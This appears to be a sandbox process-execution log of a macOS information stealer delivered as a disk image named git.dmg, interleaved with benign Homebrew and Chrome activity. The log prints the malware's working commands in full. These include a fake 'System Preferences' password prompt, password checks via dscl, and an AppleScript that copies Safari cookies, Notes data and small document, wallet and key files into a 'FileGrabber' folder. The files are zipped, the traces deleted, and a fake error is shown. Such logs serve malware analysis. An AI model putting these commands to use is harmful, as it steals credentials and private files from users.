/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=69"1⤵
-
/usr/bin/hdiutilhdiutil attach git.dmg1⤵
-
/usr/libexec/xpcproxyxpcproxy com.apple.hdiejectd1⤵
-
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/hdiejectd/System/Library/PrivateFrameworks/DiskImages.framework/Resources/hdiejectd1⤵
-
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid 78B5B8B8-A83E-466F-9FB5-4E5ABD0413D31⤵
-
/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper/System/Library/PrivateFrameworks/DiskImages.framework/Resources/diskimages-helper -uuid 78B5B8B8-A83E-466F-9FB5-4E5ABD0413D3 -post-exec 41⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=data_decoder.mojom.DataDecoderService" "--lang=en-GB" "--service-sandbox-type=service" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=115"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=83"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=83"1⤵
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=116"1⤵
-
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -p disk3s1 removable readonly1⤵
-
/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util/System/Library/Filesystems/hfs.fs/Contents/Resources/./hfs.util -k disk3s11⤵
-
/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs/System/Library/Filesystems/hfs.fs/Contents/Resources/./fsck_hfs -q /dev/rdisk3s11⤵
-
/sbin/mount/sbin/mount -t hfs -o "-u=502,-g=20,-m=755,nodev,noowners,nosuid,rdonly" /dev/disk3s1 /Volumes/Git1⤵
-
/sbin/mount_hfs/sbin/mount_hfs -u 502 -g 20 -m 755 -o nodev -o noowners -o nosuid -o rdonly /dev/disk3s1 /Volumes/Git2⤵
-
-
/usr/bin/grepgrep /Volumes1⤵
-
/usr/bin/awkawk "{print \$NF}"1⤵
-
/usr/libexec/xpcproxyxpcproxy com.apple.metadata.mdwrite1⤵
-
/bin/shsh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"1⤵
-
/bin/bashsh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"1⤵
-
/usr/bin/osascriptosascript -e "tell application \"Terminal\" to set visible of front window to false"1⤵
-
/bin/shsh -c "mkdir /Users/run/447743752"1⤵
-
/bin/bashsh -c "mkdir /Users/run/447743752"1⤵
-
/bin/mkdirmkdir /Users/run/4477437521⤵
-
/bin/shsh -c sw_vers1⤵
-
/bin/bashsh -c sw_vers1⤵
-
/usr/bin/sw_verssw_vers1⤵
-
/bin/shsh -c "system_profiler SPHardwareDataType"1⤵
-
/bin/bashsh -c "system_profiler SPHardwareDataType"1⤵
-
/usr/sbin/system_profilersystem_profiler SPHardwareDataType1⤵
-
/bin/shsh -c "system_profiler SPDisplaysDataType"1⤵
-
/bin/bashsh -c "system_profiler SPDisplaysDataType"1⤵
-
/usr/sbin/system_profilersystem_profiler SPDisplaysDataType1⤵
-
/bin/shsh -c "dscl /Local/Default -authonly run \"\""1⤵
-
/bin/bashsh -c "dscl /Local/Default -authonly run \"\""1⤵
-
/usr/bin/dscldscl /Local/Default -authonly run1⤵
-
/bin/shsh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"1⤵
-
/bin/bashsh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"1⤵
-
/usr/bin/osascriptosascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"1⤵
-
/usr/sbin/spctl/usr/sbin/spctl --assess --type execute /Applications/OneDrive.app1⤵
-
/usr/libexec/xpcproxyxpcproxy com.apple.ReportMemoryException1⤵
-
/usr/libexec/ReportMemoryException/usr/libexec/ReportMemoryException1⤵
-
/bin/shsh -c "dscl /Local/Default -authonly run root"1⤵
-
/bin/bashsh -c "dscl /Local/Default -authonly run root"1⤵
-
/usr/bin/dscldscl /Local/Default -authonly run root1⤵
-
/bin/shsh -c "mkdir -p '/Users/run/447743752/Chromium/Chrome'"1⤵
-
/bin/bashsh -c "mkdir -p '/Users/run/447743752/Chromium/Chrome'"1⤵
-
/bin/mkdirmkdir -p /Users/run/447743752/Chromium/Chrome1⤵
-
/bin/shsh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"447743752\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"447743752:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"1⤵
-
/bin/bashsh -c "osascript -e 'set baseFolderPath to (path to home folder as text) & \"447743752\"' -e 'set fileGrabberFolderPath to (path to home folder as text) & \"447743752:FileGrabber:\"' -e 'tell application \"Finder\"' -e 'set username to short user name of (system info)' -e 'try' -e 'if not (exists folder fileGrabberFolderPath) then' -e 'make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}' -e 'end if' -e 'set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")' -e 'try' -e 'duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing' -e 'end try' -e 'set homePath to path to home folder as string' -e 'set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"' -e 'try' -e 'duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing' -e 'end try' -e 'set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}' -e 'set desktopFiles to every file of desktop' -e 'set documentsFiles to every file of folder \"Documents\" of (path to home folder)' -e 'repeat with aFile in (desktopFiles & documentsFiles)' -e 'set fileExtension to name extension of aFile' -e 'if fileExtension is in extensionsList then' -e 'set fileSize to size of aFile' -e 'if fileSize ≤ 51200 then' -e 'duplicate aFile to folder fileGrabberFolderPath with replacing' -e 'end if' -e 'end if' -e 'end repeat' -e 'end try' -e 'end tell'"1⤵
-
/usr/bin/osascriptosascript -e "set baseFolderPath to (path to home folder as text) & \"447743752\"" -e "set fileGrabberFolderPath to (path to home folder as text) & \"447743752:FileGrabber:\"" -e "tell application \"Finder\"" -e "set username to short user name of (system info)" -e try -e "if not (exists folder fileGrabberFolderPath) then" -e "make new folder at folder baseFolderPath with properties {name:\"FileGrabber\"}" -e "end if" -e "set safariFolder to ((path to library folder from user domain as text) & \"Containers:com.apple.Safari:Data:Library:Cookies:\")" -e try -e "duplicate file \"Cookies.binarycookies\" of folder safariFolder to folder baseFolderPath with replacing" -e "end try" -e "set homePath to path to home folder as string" -e "set sourceFilePath to homePath & \"Library:Group Containers:group.com.apple.notes:\"" -e try -e "duplicate file \"NoteStore.sqlite\" of folder sourceFilePath to folder baseFolderPath with replacing" -e "end try" -e "set extensionsList to {\"txt\", \"docx\", \"rtf\", \"doc\", \"wallet\", \"keys\", \"key\"}" -e "set desktopFiles to every file of desktop" -e "set documentsFiles to every file of folder \"Documents\" of (path to home folder)" -e "repeat with aFile in (desktopFiles & documentsFiles)" -e "set fileExtension to name extension of aFile" -e "if fileExtension is in extensionsList then" -e "set fileSize to size of aFile" -e "if fileSize ≤ 51200 then" -e "duplicate aFile to folder fileGrabberFolderPath with replacing" -e "end if" -e "end if" -e "end repeat" -e "end try" -e "end tell"1⤵
-
/usr/bin/readlinkreadlink /usr/local/bin/brew1⤵
-
/usr/bin/dirnamedirname ../Homebrew/bin/brew1⤵
-
/usr/bin/readlinkreadlink /usr/local/bin/brew1⤵
-
/usr/bin/dirnamedirname ../Homebrew/bin/brew1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/git/usr/local/Homebrew/Library/Homebrew/shims/shared/git -C /usr/local/Homebrew describe --tags --dirty "--abbrev=7"1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select -print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun -find git1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git -C /usr/local/Homebrew describe --tags --dirty "--abbrev=7"1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/curl/usr/local/Homebrew/Library/Homebrew/shims/shared/curl --version1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/curl/usr/bin/curl --version1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select --print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun clang1⤵
-
/Library/Developer/CommandLineTools/usr/bin/clang/Library/Developer/CommandLineTools/usr/bin/clang1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/git/usr/local/Homebrew/Library/Homebrew/shims/shared/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.devcmdrun1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select -print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun -find git1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.devcmdrun1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/git/usr/local/Homebrew/Library/Homebrew/shims/shared/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsmessage1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select -print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun -find git1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsmessage1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/git/usr/local/Homebrew/Library/Homebrew/shims/shared/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsdisabled1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select -print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun -find git1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsdisabled1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/git/usr/local/Homebrew/Library/Homebrew/shims/shared/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsuuid1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select -print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun -find git1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsuuid1⤵
-
/usr/bin/findfind /usr/local/Homebrew/.git/FETCH_HEAD -type f -mtime -300s1⤵
-
/bin/sleepsleep 31⤵
-
/usr/bin/readlinkreadlink /usr/local/bin/brew1⤵
-
/usr/bin/dirnamedirname ../Homebrew/bin/brew1⤵
-
/usr/bin/readlinkreadlink /usr/local/bin/brew1⤵
-
/usr/bin/dirnamedirname ../Homebrew/bin/brew1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/git/usr/local/Homebrew/Library/Homebrew/shims/shared/git -C /usr/local/Homebrew describe --tags --dirty "--abbrev=7"1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select -print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun -find git1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git -C /usr/local/Homebrew describe --tags --dirty "--abbrev=7"1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/curl/usr/local/Homebrew/Library/Homebrew/shims/shared/curl --version1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/curl/usr/bin/curl --version1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select --print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun clang1⤵
-
/Library/Developer/CommandLineTools/usr/bin/clang/Library/Developer/CommandLineTools/usr/bin/clang1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/git/usr/local/Homebrew/Library/Homebrew/shims/shared/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.devcmdrun1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select -print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun -find git1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.devcmdrun1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/git/usr/local/Homebrew/Library/Homebrew/shims/shared/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsmessage1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select -print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun -find git1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsmessage1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/git/usr/local/Homebrew/Library/Homebrew/shims/shared/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsdisabled1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select -print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun -find git1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsdisabled1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/git/usr/local/Homebrew/Library/Homebrew/shims/shared/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsuuid1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select -print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun -find git1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config "--file=/usr/local/Homebrew/.git/config" --get homebrew.analyticsuuid1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/xcode-select/usr/bin/xcode-select -print-path1⤵
-
/usr/bin/xcrun/usr/bin/xcrun -find git1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/libexec/xpcproxyxpcproxy com.apple.spindump1⤵
-
/usr/sbin/spindump/usr/sbin/spindump1⤵
-
/usr/libexec/xpcproxyxpcproxy com.apple.spindump_agent1⤵
-
/usr/libexec/spindump_agent/usr/libexec/spindump_agent1⤵
-
/usr/libexec/xpcproxyxpcproxy com.apple.DesktopServicesHelper.D7ED6BC7-86D9-4663-A948-A06B42D4ED6A1⤵
-
/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Resources/DesktopServicesHelper1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config homebrew.linuxbrewmigrated1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git symbolic-ref refs/remotes/origin/HEAD1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git rev-parse -q --verify refs/remotes/origin/master1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git tag --list1⤵
-
/bin/shsh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/447743752 /Users/run/447743752.zip --norsrc --noextattr"1⤵
-
/bin/bashsh -c "ditto -c -k --sequesterRsrc --keepParent /Users/run/447743752 /Users/run/447743752.zip --norsrc --noextattr"1⤵
-
/usr/bin/dittoditto -c -k --sequesterRsrc --keepParent /Users/run/447743752 /Users/run/447743752.zip --norsrc --noextattr1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config remote.origin.url1⤵
-
/usr/bin/trtr -C A-Za-z0-9 _1⤵
-
/usr/bin/trtr "[:lower:]" "[:upper:]"1⤵
-
/usr/bin/sedsed -n "s/^ETag: \"\\([a-f0-9]\\{32\\}\\)\".*/\\1/p" .git/GITHUB_HEADERS1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git symbolic-ref refs/remotes/origin/HEAD1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/curl/usr/local/Homebrew/Library/Homebrew/shims/shared/curl "--homebrew=print-path"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git rev-parse -q --verify refs/remotes/origin/master1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config remote.origin.url1⤵
-
/usr/bin/trtr -C A-Za-z0-9 _1⤵
-
/usr/bin/trtr "[:lower:]" "[:upper:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git rev-parse refs/remotes/origin/master1⤵
-
/usr/bin/curl/usr/bin/curl -q --silent --max-time 3 --location --no-remote-time --output /dev/null --write-out "%{http_code}" --dump-header /usr/local/Homebrew/.git/GITHUB_HEADERS --user-agent "Homebrew/3.2.17 (Macintosh; Intel Mac OS X 10.15.1) curl/7.64.1" --header "Accept: application/vnd.github.v3+json" --header "If-None-Match: \"\"" https://api.github.com/repos/Homebrew/brew/tags1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/curl/usr/local/Homebrew/Library/Homebrew/shims/shared/curl "--homebrew=print-path"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git symbolic-ref refs/remotes/origin/HEAD1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git rev-parse -q --verify refs/remotes/origin/master1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git config remote.origin.url1⤵
-
/usr/bin/curl/usr/bin/curl -q --silent --max-time 3 --location --no-remote-time --output /dev/null --write-out "%{http_code}" --dump-header /usr/local/Homebrew/Library/Taps/homebrew/homebrew-cask/.git/GITHUB_HEADERS --user-agent "Homebrew/3.2.17 (Macintosh; Intel Mac OS X 10.15.1) curl/7.64.1" --header "Accept: application/vnd.github.v3.sha" --header "If-None-Match: \"c72519a7d0df4e03df68bc43aae56ae0b500a659\"" https://api.github.com/repos/Homebrew/homebrew-cask/commits/master1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git rev-parse refs/remotes/origin/master1⤵
-
/usr/local/Homebrew/Library/Homebrew/shims/shared/curl/usr/local/Homebrew/Library/Homebrew/shims/shared/curl "--homebrew=print-path"1⤵
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵
-
/usr/bin/curl/usr/bin/curl -q --silent --max-time 3 --location --no-remote-time --output /dev/null --write-out "%{http_code}" --dump-header /usr/local/Homebrew/Library/Taps/homebrew/homebrew-core/.git/GITHUB_HEADERS --user-agent "Homebrew/3.2.17 (Macintosh; Intel Mac OS X 10.15.1) curl/7.64.1" --header "Accept: application/vnd.github.v3.sha" --header "If-None-Match: \"1f235b287a16efc98309923812f8a161b8cd7b0f\"" https://api.github.com/repos/Homebrew/homebrew-core/commits/master1⤵
-
/bin/rmrm -f /usr/local/Homebrew/.git/TMP_FETCH_FAILURES1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git fetch --tags --force -q origin refs/heads/master:refs/remotes/origin/master1⤵
-
/Library/Developer/CommandLineTools/usr/libexec/git-core/git-remote-https/Library/Developer/CommandLineTools/usr/libexec/git-core/git-remote-https origin https://github.com/Homebrew/homebrew-cask2⤵
-
/Library/Developer/CommandLineTools/usr/libexec/git-core/git/Library/Developer/CommandLineTools/usr/libexec/git-core/git fetch-pack --stateless-rpc --stdin --lock-pack --thin --no-progress https://github.com/Homebrew/homebrew-cask/3⤵
-
/Library/Developer/CommandLineTools/usr/libexec/git-core/git/Library/Developer/CommandLineTools/usr/libexec/git-core/git index-pack --stdin --fix-thin "--keep=fetch-pack 1017 on tests-iMac.local" "--pack_header=2,365306"4⤵
-
-
-
-
/usr/bin/touchtouch /usr/local/Homebrew/Library/Taps/homebrew/homebrew-core/.git/FETCH_HEAD1⤵
-
/bin/rmrm -f /usr/local/Homebrew/.git/TMP_FETCH_FAILURES1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git fetch --tags --force -q origin refs/heads/master:refs/remotes/origin/master1⤵
-
/Library/Developer/CommandLineTools/usr/libexec/git-core/git-remote-https/Library/Developer/CommandLineTools/usr/libexec/git-core/git-remote-https origin https://github.com/Homebrew/homebrew-core2⤵
-
/Library/Developer/CommandLineTools/usr/libexec/git-core/git/Library/Developer/CommandLineTools/usr/libexec/git-core/git fetch-pack --stateless-rpc --stdin --lock-pack --thin --no-progress https://github.com/Homebrew/homebrew-core/3⤵
-
/Library/Developer/CommandLineTools/usr/libexec/git-core/git/Library/Developer/CommandLineTools/usr/libexec/git-core/git index-pack --stdin --fix-thin "--keep=fetch-pack 1018 on tests-iMac.local" "--pack_header=2,942447"4⤵
-
-
-
-
/usr/bin/touchtouch /usr/local/Homebrew/.git/FETCH_HEAD1⤵
-
/bin/rmrm -f /usr/local/Homebrew/.git/TMP_FETCH_FAILURES1⤵
-
/Library/Developer/CommandLineTools/usr/bin/git/Library/Developer/CommandLineTools/usr/bin/git fetch --tags --force -q origin refs/heads/master:refs/remotes/origin/master1⤵
-
/Library/Developer/CommandLineTools/usr/libexec/git-core/git-remote-https/Library/Developer/CommandLineTools/usr/libexec/git-core/git-remote-https origin https://github.com/Homebrew/brew2⤵
-
/Library/Developer/CommandLineTools/usr/libexec/git-core/git/Library/Developer/CommandLineTools/usr/libexec/git-core/git fetch-pack --stateless-rpc --stdin --lock-pack --thin --no-progress https://github.com/Homebrew/brew/3⤵
-
/Library/Developer/CommandLineTools/usr/libexec/git-core/git/Library/Developer/CommandLineTools/usr/libexec/git-core/git index-pack --stdin --fix-thin "--keep=fetch-pack 1015 on tests-iMac.local" "--pack_header=2,74943"4⤵
-
-
-
-
/Library/Developer/CommandLineTools/usr/libexec/git-core/git/Library/Developer/CommandLineTools/usr/libexec/git-core/git rev-list --objects --stdin --not --all --quiet --alternate-refs2⤵
-
-
/Library/Developer/CommandLineTools/usr/libexec/git-core/git/Library/Developer/CommandLineTools/usr/libexec/git-core/git gc --auto --quiet2⤵
-
-
/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper"/Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/101.0.4951.54/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper" "--type=utility" "--utility-sub-type=unzip.mojom.Unzipper" "--lang=en-GB" "--service-sandbox-type=utility" "--metrics-client-id=c4c0c7dc-66bc-4341-87b4-36b4665ab2e7" --shared-files "--field-trial-handle=1718379636,r,9429475778656422221,8968806579654328096,131072" "--seatbelt-client=116"1⤵
-
/bin/shsh -c "rm -rf /Users/run/447743752"1⤵
-
/bin/bashsh -c "rm -rf /Users/run/447743752"1⤵
-
/bin/rmrm -rf /Users/run/4477437521⤵
-
/bin/shsh -c "rm /Users/run/447743752.zip"1⤵
-
/bin/bashsh -c "rm /Users/run/447743752.zip"1⤵
-
/bin/rmrm /Users/run/447743752.zip1⤵
-
/bin/shsh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"1⤵
-
/bin/bashsh -c "osascript -e 'display dialog \"Some error occurred while running the application.\" buttons {\"OK\"} default button 1 with icon stop'"1⤵
-
